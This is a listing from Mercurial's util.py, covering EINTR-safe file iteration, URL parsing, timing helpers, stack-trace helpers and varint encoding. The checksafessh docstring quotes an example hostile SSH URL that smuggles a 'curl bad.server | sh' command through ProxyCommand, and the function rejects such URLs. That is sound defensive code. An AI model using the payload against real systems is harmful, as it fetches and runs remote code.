2801 2807 def _crlfwriter(fp):
2802 2808 return transformingwriter(fp, tocrlf)
2803 2809
2804 2810
2805 2811 if pycompat.oslinesep == b'\r\n':
2806 2812 tonativeeol = tocrlf
2807 2813 fromnativeeol = tolf
2808 2814 nativeeolwriter = _crlfwriter
2809 2815 else:
2810 2816 tonativeeol = pycompat.identity
2811 2817 fromnativeeol = pycompat.identity
2812 2818 nativeeolwriter = pycompat.identity
2813 2819
2814 2820 if pyplatform.python_implementation() == b'CPython' and sys.version_info < (
2815 2821 3,
2816 2822 0,
2817 2823 ):
2818 2824 # There is an issue in CPython that some IO methods do not handle EINTR
2819 2825 # correctly. The following table shows what CPython version (and functions)
2820 2826 # are affected (buggy: has the EINTR bug, okay: otherwise):
2821 2827 #
2822 2828 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2823 2829 # --------------------------------------------------
2824 2830 # fp.__iter__ | buggy | buggy | okay
2825 2831 # fp.read* | buggy | okay [1] | okay
2826 2832 #
2827 2833 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2828 2834 #
2829 2835 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2830 2836 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2831 2837 #
2832 2838 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2833 2839 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2834 2840 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2835 2841 # fp.__iter__ but not other fp.read* methods.
2836 2842 #
2837 2843 # On modern systems like Linux, the "read" syscall cannot be interrupted
2838 2844 # when reading "fast" files like on-disk files. So the EINTR issue only
2839 2845 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2840 2846 # files approximately as "fast" files and use the fast (unsafe) code path,
2841 2847 # to minimize the performance impact.
2842 2848 if sys.version_info >= (2, 7, 4):
2843 2849 # fp.readline deals with EINTR correctly, use it as a workaround.
2844 2850 def _safeiterfile(fp):
2845 2851 return iter(fp.readline, b'')
2846 2852
2847 2853 else:
2848 2854 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2849 2855 # note: this may block longer than necessary because of bufsize.
2850 2856 def _safeiterfile(fp, bufsize=4096):
2851 2857 fd = fp.fileno()
2852 2858 line = b''
2853 2859 while True:
2854 2860 try:
2855 2861 buf = os.read(fd, bufsize)
2856 2862 except OSError as ex:
2857 2863 # os.read only raises EINTR before any data is read
2858 2864 if ex.errno == errno.EINTR:
2859 2865 continue
2860 2866 else:
2861 2867 raise
2862 2868 line += buf
2863 2869 if b'\n' in buf:
2864 2870 splitted = line.splitlines(True)
2865 2871 line = b''
2866 2872 for l in splitted:
2867 2873 if l[-1] == b'\n':
2868 2874 yield l
2869 2875 else:
2870 2876 line = l
2871 2877 if not buf:
2872 2878 break
2873 2879 if line:
2874 2880 yield line
2875 2881
2876 2882 def iterfile(fp):
2877 2883 fastpath = True
2878 2884 if type(fp) is file:
2879 2885 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2880 2886 if fastpath:
2881 2887 return fp
2882 2888 else:
2883 2889 return _safeiterfile(fp)
2884 2890
2885 2891
2886 2892 else:
2887 2893 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2888 2894 def iterfile(fp):
2889 2895 return fp
2890 2896
2891 2897
2892 2898 def iterlines(iterator):
2893 2899 for chunk in iterator:
2894 2900 for line in chunk.splitlines():
2895 2901 yield line
2896 2902
2897 2903
2898 2904 def expandpath(path):
2899 2905 return os.path.expanduser(os.path.expandvars(path))
2900 2906
2901 2907
2902 2908 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2903 2909 """Return the result of interpolating items in the mapping into string s.
2904 2910
2905 2911 prefix is a single character string, or a two character string with
2906 2912 a backslash as the first character if the prefix needs to be escaped in
2907 2913 a regular expression.
2908 2914
2909 2915 fn is an optional function that will be applied to the replacement text
2910 2916 just before replacement.
2911 2917
2912 2918 escape_prefix is an optional flag that allows using doubled prefix for
2913 2919 its escaping.
2914 2920 """
2915 2921 fn = fn or (lambda s: s)
2916 2922 patterns = b'|'.join(mapping.keys())
2917 2923 if escape_prefix:
2918 2924 patterns += b'|' + prefix
2919 2925 if len(prefix) > 1:
2920 2926 prefix_char = prefix[1:]
2921 2927 else:
2922 2928 prefix_char = prefix
2923 2929 mapping[prefix_char] = prefix_char
2924 2930 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2925 2931 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2926 2932
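# Illustrative example (not part of util.py): every mapping key is
# matched right after the prefix and replaced in a single pass.
#
# >>> interpolate(b'%', {b'user': b'alice', b'repo': b'hg'}, b'%user@%repo')
# 'alice@hg'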
2927 2933
2928 2934 def getport(port):
2929 2935 """Return the port for a given network service.
2930 2936
2931 2937 If port is an integer, it's returned as is. If it's a string, it's
2932 2938 looked up using socket.getservbyname(). If there's no matching
2933 2939 service, error.Abort is raised.
2934 2940 """
2935 2941 try:
2936 2942 return int(port)
2937 2943 except ValueError:
2938 2944 pass
2939 2945
2940 2946 try:
2941 2947 return socket.getservbyname(pycompat.sysstr(port))
2942 2948 except socket.error:
2943 2949 raise error.Abort(
2944 2950 _(b"no port number associated with service '%s'") % port
2945 2951 )
2946 2952
2947 2953
2948 2954 class url(object):
2949 2955 r"""Reliable URL parser.
2950 2956
2951 2957 This parses URLs and provides attributes for the following
2952 2958 components:
2953 2959
2954 2960 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2955 2961
2956 2962 Missing components are set to None. The only exception is
2957 2963 fragment, which is set to '' if present but empty.
2958 2964
2959 2965 If parsefragment is False, fragment is included in query. If
2960 2966 parsequery is False, query is included in path. If both are
2961 2967 False, both fragment and query are included in path.
2962 2968
2963 2969 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2964 2970
2965 2971 Note that for backward compatibility reasons, bundle URLs do not
2966 2972 take host names. That means 'bundle://../' has a path of '../'.
2967 2973
2968 2974 Examples:
2969 2975
2970 2976 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2971 2977 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2972 2978 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2973 2979 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2974 2980 >>> url(b'file:///home/joe/repo')
2975 2981 <url scheme: 'file', path: '/home/joe/repo'>
2976 2982 >>> url(b'file:///c:/temp/foo/')
2977 2983 <url scheme: 'file', path: 'c:/temp/foo/'>
2978 2984 >>> url(b'bundle:foo')
2979 2985 <url scheme: 'bundle', path: 'foo'>
2980 2986 >>> url(b'bundle://../foo')
2981 2987 <url scheme: 'bundle', path: '../foo'>
2982 2988 >>> url(br'c:\foo\bar')
2983 2989 <url path: 'c:\\foo\\bar'>
2984 2990 >>> url(br'\\blah\blah\blah')
2985 2991 <url path: '\\\\blah\\blah\\blah'>
2986 2992 >>> url(br'\\blah\blah\blah#baz')
2987 2993 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2988 2994 >>> url(br'file:///C:\users\me')
2989 2995 <url scheme: 'file', path: 'C:\\users\\me'>
2990 2996
2991 2997 Authentication credentials:
2992 2998
2993 2999 >>> url(b'ssh://joe:xyz@x/repo')
2994 3000 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2995 3001 >>> url(b'ssh://joe@x/repo')
2996 3002 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2997 3003
2998 3004 Query strings and fragments:
2999 3005
3000 3006 >>> url(b'http://host/a?b#c')
3001 3007 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
3002 3008 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
3003 3009 <url scheme: 'http', host: 'host', path: 'a?b#c'>
3004 3010
3005 3011 Empty path:
3006 3012
3007 3013 >>> url(b'')
3008 3014 <url path: ''>
3009 3015 >>> url(b'#a')
3010 3016 <url path: '', fragment: 'a'>
3011 3017 >>> url(b'http://host/')
3012 3018 <url scheme: 'http', host: 'host', path: ''>
3013 3019 >>> url(b'http://host/#a')
3014 3020 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3015 3021
3016 3022 Only scheme:
3017 3023
3018 3024 >>> url(b'http:')
3019 3025 <url scheme: 'http'>
3020 3026 """
3021 3027
3022 3028 _safechars = b"!~*'()+"
3023 3029 _safepchars = b"/!~*'()+:\\"
3024 3030 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
3025 3031
3026 3032 def __init__(self, path, parsequery=True, parsefragment=True):
3027 3033 # We slowly chomp away at path until we have only the path left
3028 3034 self.scheme = self.user = self.passwd = self.host = None
3029 3035 self.port = self.path = self.query = self.fragment = None
3030 3036 self._localpath = True
3031 3037 self._hostport = b''
3032 3038 self._origpath = path
3033 3039
3034 3040 if parsefragment and b'#' in path:
3035 3041 path, self.fragment = path.split(b'#', 1)
3036 3042
3037 3043 # special case for Windows drive letters and UNC paths
3038 3044 if hasdriveletter(path) or path.startswith(b'\\\\'):
3039 3045 self.path = path
3040 3046 return
3041 3047
3042 3048 # For compatibility reasons, we can't handle bundle paths as
3043 3049 # normal URLS
3044 3050 if path.startswith(b'bundle:'):
3045 3051 self.scheme = b'bundle'
3046 3052 path = path[7:]
3047 3053 if path.startswith(b'//'):
3048 3054 path = path[2:]
3049 3055 self.path = path
3050 3056 return
3051 3057
3052 3058 if self._matchscheme(path):
3053 3059 parts = path.split(b':', 1)
3054 3060 if parts[0]:
3055 3061 self.scheme, path = parts
3056 3062 self._localpath = False
3057 3063
3058 3064 if not path:
3059 3065 path = None
3060 3066 if self._localpath:
3061 3067 self.path = b''
3062 3068 return
3063 3069 else:
3064 3070 if self._localpath:
3065 3071 self.path = path
3066 3072 return
3067 3073
3068 3074 if parsequery and b'?' in path:
3069 3075 path, self.query = path.split(b'?', 1)
3070 3076 if not path:
3071 3077 path = None
3072 3078 if not self.query:
3073 3079 self.query = None
3074 3080
3075 3081 # // is required to specify a host/authority
3076 3082 if path and path.startswith(b'//'):
3077 3083 parts = path[2:].split(b'/', 1)
3078 3084 if len(parts) > 1:
3079 3085 self.host, path = parts
3080 3086 else:
3081 3087 self.host = parts[0]
3082 3088 path = None
3083 3089 if not self.host:
3084 3090 self.host = None
3085 3091 # path of file:///d is /d
3086 3092 # path of file:///d:/ is d:/, not /d:/
3087 3093 if path and not hasdriveletter(path):
3088 3094 path = b'/' + path
3089 3095
3090 3096 if self.host and b'@' in self.host:
3091 3097 self.user, self.host = self.host.rsplit(b'@', 1)
3092 3098 if b':' in self.user:
3093 3099 self.user, self.passwd = self.user.split(b':', 1)
3094 3100 if not self.host:
3095 3101 self.host = None
3096 3102
3097 3103 # Don't split on colons in IPv6 addresses without ports
3098 3104 if (
3099 3105 self.host
3100 3106 and b':' in self.host
3101 3107 and not (
3102 3108 self.host.startswith(b'[') and self.host.endswith(b']')
3103 3109 )
3104 3110 ):
3105 3111 self._hostport = self.host
3106 3112 self.host, self.port = self.host.rsplit(b':', 1)
3107 3113 if not self.host:
3108 3114 self.host = None
3109 3115
3110 3116 if (
3111 3117 self.host
3112 3118 and self.scheme == b'file'
3113 3119 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
3114 3120 ):
3115 3121 raise error.Abort(
3116 3122 _(b'file:// URLs can only refer to localhost')
3117 3123 )
3118 3124
3119 3125 self.path = path
3120 3126
3121 3127 # leave the query string escaped
3122 3128 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
3123 3129 v = getattr(self, a)
3124 3130 if v is not None:
3125 3131 setattr(self, a, urlreq.unquote(v))
3126 3132
3127 3133 @encoding.strmethod
3128 3134 def __repr__(self):
3129 3135 attrs = []
3130 3136 for a in (
3131 3137 b'scheme',
3132 3138 b'user',
3133 3139 b'passwd',
3134 3140 b'host',
3135 3141 b'port',
3136 3142 b'path',
3137 3143 b'query',
3138 3144 b'fragment',
3139 3145 ):
3140 3146 v = getattr(self, a)
3141 3147 if v is not None:
3142 3148 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
3143 3149 return b'<url %s>' % b', '.join(attrs)
3144 3150
3145 3151 def __bytes__(self):
3146 3152 r"""Join the URL's components back into a URL string.
3147 3153
3148 3154 Examples:
3149 3155
3150 3156 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3151 3157 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3152 3158 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3153 3159 'http://user:pw@host:80/?foo=bar&baz=42'
3154 3160 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3155 3161 'http://user:pw@host:80/?foo=bar%3dbaz'
3156 3162 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3157 3163 'ssh://user:pw@[::1]:2200//home/joe#'
3158 3164 >>> bytes(url(b'http://localhost:80//'))
3159 3165 'http://localhost:80//'
3160 3166 >>> bytes(url(b'http://localhost:80/'))
3161 3167 'http://localhost:80/'
3162 3168 >>> bytes(url(b'http://localhost:80'))
3163 3169 'http://localhost:80/'
3164 3170 >>> bytes(url(b'bundle:foo'))
3165 3171 'bundle:foo'
3166 3172 >>> bytes(url(b'bundle://../foo'))
3167 3173 'bundle:../foo'
3168 3174 >>> bytes(url(b'path'))
3169 3175 'path'
3170 3176 >>> bytes(url(b'file:///tmp/foo/bar'))
3171 3177 'file:///tmp/foo/bar'
3172 3178 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3173 3179 'file:///c:/tmp/foo/bar'
3174 3180 >>> print(url(br'bundle:foo\bar'))
3175 3181 bundle:foo\bar
3176 3182 >>> print(url(br'file:///D:\data\hg'))
3177 3183 file:///D:\data\hg
3178 3184 """
3179 3185 if self._localpath:
3180 3186 s = self.path
3181 3187 if self.scheme == b'bundle':
3182 3188 s = b'bundle:' + s
3183 3189 if self.fragment:
3184 3190 s += b'#' + self.fragment
3185 3191 return s
3186 3192
3187 3193 s = self.scheme + b':'
3188 3194 if self.user or self.passwd or self.host:
3189 3195 s += b'//'
3190 3196 elif self.scheme and (
3191 3197 not self.path
3192 3198 or self.path.startswith(b'/')
3193 3199 or hasdriveletter(self.path)
3194 3200 ):
3195 3201 s += b'//'
3196 3202 if hasdriveletter(self.path):
3197 3203 s += b'/'
3198 3204 if self.user:
3199 3205 s += urlreq.quote(self.user, safe=self._safechars)
3200 3206 if self.passwd:
3201 3207 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
3202 3208 if self.user or self.passwd:
3203 3209 s += b'@'
3204 3210 if self.host:
3205 3211 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
3206 3212 s += urlreq.quote(self.host)
3207 3213 else:
3208 3214 s += self.host
3209 3215 if self.port:
3210 3216 s += b':' + urlreq.quote(self.port)
3211 3217 if self.host:
3212 3218 s += b'/'
3213 3219 if self.path:
3214 3220 # TODO: similar to the query string, we should not unescape the
3215 3221 # path when we store it, the path might contain '%2f' = '/',
3216 3222 # which we should *not* escape.
3217 3223 s += urlreq.quote(self.path, safe=self._safepchars)
3218 3224 if self.query:
3219 3225 # we store the query in escaped form.
3220 3226 s += b'?' + self.query
3221 3227 if self.fragment is not None:
3222 3228 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
3223 3229 return s
3224 3230
3225 3231 __str__ = encoding.strmethod(__bytes__)
3226 3232
3227 3233 def authinfo(self):
3228 3234 user, passwd = self.user, self.passwd
3229 3235 try:
3230 3236 self.user, self.passwd = None, None
3231 3237 s = bytes(self)
3232 3238 finally:
3233 3239 self.user, self.passwd = user, passwd
3234 3240 if not self.user:
3235 3241 return (s, None)
3236 3242 # authinfo[1] is passed to urllib2 password manager, and its
3237 3243 # URIs must not contain credentials. The host is passed in the
3238 3244 # URIs list because Python < 2.4.3 uses only that to search for
3239 3245 # a password.
3240 3246 return (s, (None, (s, self.host), self.user, self.passwd or b''))
3241 3247
3242 3248 def isabs(self):
3243 3249 if self.scheme and self.scheme != b'file':
3244 3250 return True # remote URL
3245 3251 if hasdriveletter(self.path):
3246 3252 return True # absolute for our purposes - can't be joined()
3247 3253 if self.path.startswith(br'\\'):
3248 3254 return True # Windows UNC path
3249 3255 if self.path.startswith(b'/'):
3250 3256 return True # POSIX-style
3251 3257 return False
3252 3258
3253 3259 def localpath(self):
3254 3260 if self.scheme == b'file' or self.scheme == b'bundle':
3255 3261 path = self.path or b'/'
3256 3262 # For Windows, we need to promote hosts containing drive
3257 3263 # letters to paths with drive letters.
3258 3264 if hasdriveletter(self._hostport):
3259 3265 path = self._hostport + b'/' + self.path
3260 3266 elif (
3261 3267 self.host is not None and self.path and not hasdriveletter(path)
3262 3268 ):
3263 3269 path = b'/' + path
3264 3270 return path
3265 3271 return self._origpath
3266 3272
3267 3273 def islocal(self):
3268 3274 '''whether localpath will return something that posixfile can open'''
3269 3275 return (
3270 3276 not self.scheme
3271 3277 or self.scheme == b'file'
3272 3278 or self.scheme == b'bundle'
3273 3279 )
3274 3280
3275 3281
3276 3282 def hasscheme(path):
3277 3283 return bool(url(path).scheme)
3278 3284
3279 3285
3280 3286 def hasdriveletter(path):
3281 3287 return path and path[1:2] == b':' and path[0:1].isalpha()
3282 3288
3283 3289
3284 3290 def urllocalpath(path):
3285 3291 return url(path, parsequery=False, parsefragment=False).localpath()
3286 3292
3287 3293
3288 3294 def checksafessh(path):
3289 3295 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3290 3296
3291 3297 This is a sanity check for ssh urls. ssh will parse the first item as
3292 3298 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3293 3299 Let's prevent these potentially exploited urls entirely and warn the
3294 3300 user.
3295 3301
3296 3302 Raises an error.Abort when the url is unsafe.
3297 3303 """
3298 3304 path = urlreq.unquote(path)
3299 3305 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
3300 3306 raise error.Abort(
3301 3307 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
3302 3308 )
3303 3309
3304 3310
3305 3311 def hidepassword(u):
3306 3312 '''hide user credential in a url string'''
3307 3313 u = url(u)
3308 3314 if u.passwd:
3309 3315 u.passwd = b'***'
3310 3316 return bytes(u)
3311 3317
3312 3318
3313 3319 def removeauth(u):
3314 3320 '''remove all authentication information from a url string'''
3315 3321 u = url(u)
3316 3322 u.user = u.passwd = None
3317 3323 return bytes(u)
3318 3324
3319 3325
3320 3326 timecount = unitcountfn(
3321 3327 (1, 1e3, _(b'%.0f s')),
3322 3328 (100, 1, _(b'%.1f s')),
3323 3329 (10, 1, _(b'%.2f s')),
3324 3330 (1, 1, _(b'%.3f s')),
3325 3331 (100, 0.001, _(b'%.1f ms')),
3326 3332 (10, 0.001, _(b'%.2f ms')),
3327 3333 (1, 0.001, _(b'%.3f ms')),
3328 3334 (100, 0.000001, _(b'%.1f us')),
3329 3335 (10, 0.000001, _(b'%.2f us')),
3330 3336 (1, 0.000001, _(b'%.3f us')),
3331 3337 (100, 0.000000001, _(b'%.1f ns')),
3332 3338 (10, 0.000000001, _(b'%.2f ns')),
3333 3339 (1, 0.000000001, _(b'%.3f ns')),
3334 3340 )
3335 3341
3336 3342
3337 3343 @attr.s
3338 3344 class timedcmstats(object):
3339 3345 """Stats information produced by the timedcm context manager on entering."""
3340 3346
3341 3347 # the starting value of the timer as a float (meaning and resolution are
3342 3348 # platform dependent, see util.timer)
3343 3349 start = attr.ib(default=attr.Factory(lambda: timer()))
3344 3350 # the number of seconds as a floating point value; starts at 0, updated when
3345 3351 # the context is exited.
3346 3352 elapsed = attr.ib(default=0)
3347 3353 # the number of nested timedcm context managers.
3348 3354 level = attr.ib(default=1)
3349 3355
3350 3356 def __bytes__(self):
3351 3357 return timecount(self.elapsed) if self.elapsed else b'<unknown>'
3352 3358
3353 3359 __str__ = encoding.strmethod(__bytes__)
3354 3360
3355 3361
3356 3362 @contextlib.contextmanager
3357 3363 def timedcm(whencefmt, *whenceargs):
3358 3364 """A context manager that produces timing information for a given context.
3359 3365
3360 3366 On entering a timedcmstats instance is produced.
3361 3367
3362 3368 This context manager is reentrant.
3363 3369
3364 3370 """
3365 3371 # track nested context managers
3366 3372 timedcm._nested += 1
3367 3373 timing_stats = timedcmstats(level=timedcm._nested)
3368 3374 try:
3369 3375 with tracing.log(whencefmt, *whenceargs):
3370 3376 yield timing_stats
3371 3377 finally:
3372 3378 timing_stats.elapsed = timer() - timing_stats.start
3373 3379 timedcm._nested -= 1
3374 3380
3375 3381
3376 3382 timedcm._nested = 0
3377 3383
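# Illustrative usage (not part of util.py; rebuildindex is a hypothetical
# callable): the stats object is live, so the elapsed time can be
# inspected after the block exits.
#
# >>> with timedcm(b'rebuilding %s', b'index') as stats:  # doctest: +SKIP
# ...     rebuildindex()
# >>> print(stats)  # doctest: +SKIP
# 1.234 ms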
3378 3384
3379 3385 def timed(func):
3380 3386 '''Report the execution time of a function call to stderr.
3381 3387
3382 3388 During development, use as a decorator when you need to measure
3383 3389 the cost of a function, e.g. as follows:
3384 3390
3385 3391 @util.timed
3386 3392 def foo(a, b, c):
3387 3393 pass
3388 3394 '''
3389 3395
3390 3396 def wrapper(*args, **kwargs):
3391 3397 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3392 3398 result = func(*args, **kwargs)
3393 3399 stderr = procutil.stderr
3394 3400 stderr.write(
3395 3401 b'%s%s: %s\n'
3396 3402 % (
3397 3403 b' ' * time_stats.level * 2,
3398 3404 pycompat.bytestr(func.__name__),
3399 3405 time_stats,
3400 3406 )
3401 3407 )
3402 3408 return result
3403 3409
3404 3410 return wrapper
3405 3411
3406 3412
3407 3413 _sizeunits = (
3408 3414 (b'm', 2 ** 20),
3409 3415 (b'k', 2 ** 10),
3410 3416 (b'g', 2 ** 30),
3411 3417 (b'kb', 2 ** 10),
3412 3418 (b'mb', 2 ** 20),
3413 3419 (b'gb', 2 ** 30),
3414 3420 (b'b', 1),
3415 3421 )
3416 3422
3417 3423
3418 3424 def sizetoint(s):
3419 3425 '''Convert a space specifier to a byte count.
3420 3426
3421 3427 >>> sizetoint(b'30')
3422 3428 30
3423 3429 >>> sizetoint(b'2.2kb')
3424 3430 2252
3425 3431 >>> sizetoint(b'6M')
3426 3432 6291456
3427 3433 '''
3428 3434 t = s.strip().lower()
3429 3435 try:
3430 3436 for k, u in _sizeunits:
3431 3437 if t.endswith(k):
3432 3438 return int(float(t[: -len(k)]) * u)
3433 3439 return int(t)
3434 3440 except ValueError:
3435 3441 raise error.ParseError(_(b"couldn't parse size: %s") % s)
3436 3442
3437 3443
3438 3444 class hooks(object):
3439 3445 '''A collection of hook functions that can be used to extend a
3440 3446 function's behavior. Hooks are called in lexicographic order,
3441 3447 based on the names of their sources.'''
3442 3448
3443 3449 def __init__(self):
3444 3450 self._hooks = []
3445 3451
3446 3452 def add(self, source, hook):
3447 3453 self._hooks.append((source, hook))
3448 3454
3449 3455 def __call__(self, *args):
3450 3456 self._hooks.sort(key=lambda x: x[0])
3451 3457 results = []
3452 3458 for source, hook in self._hooks:
3453 3459 results.append(hook(*args))
3454 3460 return results
3455 3461
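# Illustrative example (not part of util.py): hooks run sorted by source
# name, so registration order does not matter.
#
# >>> h = hooks()
# >>> h.add(b'z-ext', lambda x: x * 2)
# >>> h.add(b'a-ext', lambda x: x + 1)
# >>> h(3)
# [4, 6]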
3456 3462
3457 3463 def getstackframes(skip=0, line=b' %-*s in %s\n', fileline=b'%s:%d', depth=0):
3458 3464 '''Yields lines for a nicely formatted stacktrace.
3459 3465 Skips the 'skip' last entries, then returns the last 'depth' entries.
3460 3466 Each file+linenumber is formatted according to fileline.
3461 3467 Each line is formatted according to line.
3462 3468 If line is None, it yields:
3463 3469 length of longest filepath+line number,
3464 3470 filepath+linenumber,
3465 3471 function
3466 3472
3467 3473 Not to be used in production code, but very convenient while developing.
3468 3474 '''
3469 3475 entries = [
3470 3476 (fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3471 3477 for fn, ln, func, _text in traceback.extract_stack()[: -skip - 1]
3472 3478 ][-depth:]
3473 3479 if entries:
3474 3480 fnmax = max(len(entry[0]) for entry in entries)
3475 3481 for fnln, func in entries:
3476 3482 if line is None:
3477 3483 yield (fnmax, fnln, func)
3478 3484 else:
3479 3485 yield line % (fnmax, fnln, func)
3480 3486
3481 3487
3482 3488 def debugstacktrace(
3483 3489 msg=b'stacktrace',
3484 3490 skip=0,
3485 3491 f=procutil.stderr,
3486 3492 otherf=procutil.stdout,
3487 3493 depth=0,
3488 3494 prefix=b'',
3489 3495 ):
3490 3496 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3491 3497 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3492 3498 By default it will flush stdout first.
3493 3499 It can be used everywhere and intentionally does not require an ui object.
3494 3500 Not be used in production code but very convenient while developing.
3495 3501 '''
3496 3502 if otherf:
3497 3503 otherf.flush()
3498 3504 f.write(b'%s%s at:\n' % (prefix, msg.rstrip()))
3499 3505 for line in getstackframes(skip + 1, depth=depth):
3500 3506 f.write(prefix + line)
3501 3507 f.flush()
3502 3508
3503 3509
# convenient shortcut
dst = debugstacktrace


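# Illustrative usage sketch (not part of the original module): drop a call
# to the ``dst`` shortcut anywhere to see how a code path is reached.
#
# def frobnicate():  # hypothetical function, for demonstration only
#     dst(b'entering frobnicate', depth=5)  # show the 5 innermost frames
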
def safename(f, tag, ctx, others=None):
    """
    Generate a name that is safe to rename f to in the given context.

    f: filename to rename
    tag: a string tag that will be included in the new name
    ctx: a context, in which the new name must not exist
    others: a set of other filenames that the new name must not be in

    Returns a file name of the form oldname~tag[~number] which does not exist
    in the provided context and is not in the set of other names.
    """
    if others is None:
        others = set()

    fn = b'%s~%s' % (f, tag)
    if fn not in ctx and fn not in others:
        return fn
    for n in itertools.count(1):
        fn = b'%s~%s~%s' % (f, tag, n)
        if fn not in ctx and fn not in others:
            return fn


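# Illustrative usage sketch (not part of the original module): ``ctx`` only
# needs to support the ``in`` operator, so a plain set stands in for a real
# changectx here.
#
# >>> safename(b'foo', b'orig', {b'foo~orig'}, others={b'foo~orig~1'})
# b'foo~orig~2'
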
def readexactly(stream, n):
    '''read n bytes from stream.read and abort if less was available'''
    s = stream.read(n)
    if len(s) < n:
        raise error.Abort(
            _(b"stream ended unexpectedly (got %d bytes, expected %d)")
            % (len(s), n)
        )
    return s


def uvarintencode(value):
    """Encode an unsigned integer value to a varint.

    A varint is a variable length integer of 1 or more bytes. Each byte
    except the last has the most significant bit set. The lower 7 bits of
    each byte store the value's binary representation, least significant
    group first.

    >>> uvarintencode(0)
    '\\x00'
    >>> uvarintencode(1)
    '\\x01'
    >>> uvarintencode(127)
    '\\x7f'
    >>> uvarintencode(1337)
    '\\xb9\\n'
    >>> uvarintencode(65536)
    '\\x80\\x80\\x04'
    >>> uvarintencode(-1)
    Traceback (most recent call last):
        ...
    ProgrammingError: negative value for uvarint: -1
    """
    if value < 0:
        raise error.ProgrammingError(b'negative value for uvarint: %d' % value)
    bits = value & 0x7F
    value >>= 7
    bytes = []
    while value:
        bytes.append(pycompat.bytechr(0x80 | bits))
        bits = value & 0x7F
        value >>= 7
    bytes.append(pycompat.bytechr(bits))

    return b''.join(bytes)


def uvarintdecodestream(fh):
    """Decode an unsigned variable length integer from a stream.

    The passed argument is anything that has a ``.read(N)`` method.

    >>> try:
    ...     from StringIO import StringIO as BytesIO
    ... except ImportError:
    ...     from io import BytesIO
    >>> uvarintdecodestream(BytesIO(b'\\x00'))
    0
    >>> uvarintdecodestream(BytesIO(b'\\x01'))
    1
    >>> uvarintdecodestream(BytesIO(b'\\x7f'))
    127
    >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
    1337
    >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
    65536
    >>> uvarintdecodestream(BytesIO(b'\\x80'))
    Traceback (most recent call last):
        ...
    Abort: stream ended unexpectedly (got 0 bytes, expected 1)
    """
    result = 0
    shift = 0
    while True:
        byte = ord(readexactly(fh, 1))
        result |= (byte & 0x7F) << shift
        if not (byte & 0x80):
            return result
        shift += 7


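# Illustrative round-trip sketch (not part of the original module): encoding
# and then decoding recovers the original non-negative integer.
#
# >>> from io import BytesIO
# >>> uvarintdecodestream(BytesIO(uvarintencode(1337)))
# 1337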